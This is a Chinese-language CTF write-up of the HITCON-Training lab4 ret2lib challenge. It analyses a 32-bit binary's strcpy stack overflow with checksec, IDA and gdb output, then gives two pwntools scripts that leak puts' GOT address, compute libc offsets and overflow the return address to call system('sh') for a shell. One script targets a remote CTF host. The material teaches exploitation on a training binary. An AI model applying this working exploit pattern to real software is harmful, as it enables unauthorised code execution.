题目来源
下载位置: https://github.com/scwuaptx/HITCON-Training/blob/cb60f23e444a0639c3872f205dd28cb04190de16/LAB/lab4/ret2lib
PS:内容来自于
分析
文件类型
┌──(root㉿Kali)-[~/Desktop/PWN/ret2libc3]
└─# file ret2lib
ret2lib: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID\[sha1]=c74b2683d6d3b99439c3e04d6d81b233e6a3b1b6, not stripped动态链接库编译的ELF文件
软件防护
┌──(root㉿Kali)-[~/Desktop/PWN/ret2libc3]
└─# checksec ret2lib
[*] '/root/Desktop/PWN/ret2libc3/ret2lib'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No只是开启了NX防护
允许栈溢出,NX防护开启,PIE防护关闭
IDA分析
main函数内容如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
char **v4; // [esp+4h] [ebp-11Ch]
int v5; // [esp+8h] [ebp-118h]
char src[256]; // [esp+12h] [ebp-10Eh] BYREF
char buf[10]; // [esp+112h] [ebp-Eh] BYREF
const void **v8; // [esp+11Ch] [ebp-4h]
puts("###############################");
puts("Do you know return to library ?");
puts("###############################");
puts("What do you want to see in memory?");
printf("Give me an address (in dec) :");
fflush(stdout);
read(0, buf, 10u);
v8 = (const void **)strtol(buf, v4, v5);
See_something(v8);
printf("Leave some message for me :");
fflush(stdout);
read(0, src, 0x100u);
Print_message(src);
puts("Thanks you ~");
return 0;
}这里有一个问题,就是得绕过一个位置,那就是下面这两行
......
char **v4; // [esp+4h] [ebp-11Ch]
int v5; // [esp+8h] [ebp-118h]
char buf[10]; // [esp+112h] [ebp-Eh] BYREF
const void **v8; // [esp+11Ch] [ebp-4h]
......
v8 = (const void **)strtol(buf, v4, v5);
See_something(v8);其中See_something的内容如下
int __cdecl See_something(const void **a1)
{
return printf("The content of the address : %p\n", *a1);
}strtol在这里的作用是把字符串转换为长整型,然后传给See_something函数,他拿到之后把他当作一个内存地址输出内容了,这里如果是输入的buf2内容不是数字会报错,如果输入的内容在程序中不是字符串或者说是不能通过%p输出出来那就会报错,绕过这两个才可以继续操作,后面的代码内容是
......
char src[256]; // [esp+12h] [ebp-10Eh] BYREF
......
read(0, src, 0x100u);
Print_message(src);
puts("Thanks you ~");
return 0;读了一0x100大小的数据,转换成10进制就是256大小,放到了src中,之后把这个src丢到了Print_message中,Print_message的内容如下
int __cdecl Print_message(char *src)
{
char dest[56]; // [esp+10h] [ebp-38h] BYREF
strcpy(dest, src);
return printf("Your message is : %s", dest);
}栈溢出就发生在这个函数中,他竟然把src的内容复制到了dest中,dest这个大小只有56位,但是src的大小是256,这样就产生了栈溢出。
攻击
攻击思路
第一步绕过虽然可以使用随便一个地址进行绕过,但是他这里不是为了让单纯绕过的,因为是动态链接库运行的程序我们需要通过这个方法溢出一下真实的函数地址,然后计算便宜位置找到system()函数的位置。找到这个位置之后再根据提供的so文件计算出偏移地址,再根据本地的链接库和偏移的地址拿到真实的system()函数位置。拿到之后通过执行sh字符串拿到shell,sh字符串可以直接通过python中的elf.search来搜索,在程序本身是又sh相关的字符串的,位置是在0x0804829A,他是fflush函数的名字,他的后缀有sh字样。
栈溢出的位数
使用gdb进行调试,断点打开Print_message,让其一直运行到strcpy之后,再去查看dest到ebp的位数,gdb调试返回内容如下
pwndbg> n
0x08048568 in Print_message ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────────────────────────
EAX 0xffffcff0 ◂— 'nihao\n'
EBX 0xf7f9ee34 (_GLOBAL_OFFSET_TABLE_) ◂— 0x223d2c /* ',="' */
ECX 0xffffd042 ◂— 'nihao\n'
*EDX 0xffffcff0 ◂— 'nihao\n'
EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0
ESI 0x8048670 (__libc_csu_init) ◂— push ebp
EBP 0xffffd028 —▸ 0xffffd158 ◂— 0
ESP 0xffffcfe0 —▸ 0xffffcff0 ◂— 'nihao\n'
*EIP 0x8048568 (Print_message+24) ◂— lea eax, [ebp - 0x38]
─────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────────────────────────
0x8048556 <Print_message+6> mov eax, dword ptr [ebp + 8] EAX, [0xffffd030] => 0xffffd042 ◂— 'nihao\n'
0x8048559 <Print_message+9> mov dword ptr [esp + 4], eax [0xffffcfe4] => 0xffffd042 ◂— 'nihao\n'
0x804855d <Print_message+13> lea eax, [ebp - 0x38] EAX => 0xffffcff0 —▸ 0xf7f9e7a8 (_IO_file_jumps) ◂— 0
0x8048560 <Print_message+16> mov dword ptr [esp], eax [0xffffcfe0] => 0xffffcff0 —▸ 0xf7f9e7a8 (_IO_file_jumps) ◂— 0
0x8048563 <Print_message+19> call strcpy@plt <strcpy@plt>
► 0x8048568 <Print_message+24> lea eax, [ebp - 0x38] EAX => 0xffffcff0 ◂— 0x6168696e ('niha')
0x804856b <Print_message+27> mov dword ptr [esp + 4], eax [0xffffcfe4] => 0xffffcff0 ◂— 0x6168696e ('niha')
0x804856f <Print_message+31> mov dword ptr [esp], 0x8048721 [0xffffcfe0] => 0x8048721 ◂— pop ecx /* 'Your message is : %s' */
0x8048576 <Print_message+38> call printf@plt <printf@plt>
0x804857b <Print_message+43> leave
0x804857c <Print_message+44> ret重点内容是在这段
EAX 0xffffcff0 ◂— 'nihao\n'
EBX 0xf7f9ee34 (_GLOBAL_OFFSET_TABLE_) ◂— 0x223d2c /* ',="' */
ECX 0xffffd042 ◂— 'nihao\n'
*EDX 0xffffcff0 ◂— 'nihao\n'
EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0
ESI 0x8048670 (__libc_csu_init) ◂— push ebp
EBP 0xffffd028 —▸ 0xffffd158 ◂— 0
ESP 0xffffcfe0 —▸ 0xffffcff0 ◂— 'nihao\n'
*EIP 0x8048568 (Print_message+24) ◂— lea eax, [ebp - 0x38]0xffffcff0是dest的位置,0xffffd028是ebp的位置计算出相差位数是56,这里需要+4因为要溢出到返回地址,所以溢出位数是60
攻击
#!/usr/bin/python
from pwn import *
# 利用地址
got_puts_address = "134520860"
puts_address = 0x0
io = process("./ret2libc3")
elf = ELF("/usr/lib32/libc.so.6")
elfio = ELF("./ret2libc3")
io.sendlineafter(b" :",got_puts_address)
io.recvuntil(b" : ")
# DROP的意思是是否丢掉换行符,拿到的是puts在执行环境中的位置,在去本地环境中拿到puts的地址相减,就可以拿到puts在本地环境和运行环境的偏移量
put_address_cheap = int(io.recvuntil(b"\n",drop=True),16) - elf.symbols["puts"]
payload = flat([
b"a" * 60,
put_address_cheap+elf.symbols['system'],
# 0xdeadbeef,
b"a"*4,
next(elfio.search(b"sh\x00"))
])
# elfio.search返回的是一个迭代器,需要用next来一次性都拿到,这里是拿到"sh"字符串的地址
# next(elfio.search(b"sh\x00"))
io.sendline(payload)
io.interactive()也可以通过下面这个来去做,下面的这个不需要手动去找got表
from pwn import *
elf = ELF("./libc-2.31.so")
elfio = ELF("./ret2libc3")
io = remote("pod.ctf.wlaq", "30892")
puts_got_addr = elfio.got["puts"]
io.sendlineafter(b" :", str(puts_got_addr))
io.recvuntil(b" :")
offset = int(io.recvuntil(b"\n", drop=True), 16) - elf.symbols["puts"]
payload = flat(
[
b"a" * 60,
elf.symbols["system"] + offset,
b"a" * 4,
next(elfio.search(b"sh\x00")),
]
)
print(payload)
io.sendlineafter(b" :", payload)
io.interactive()
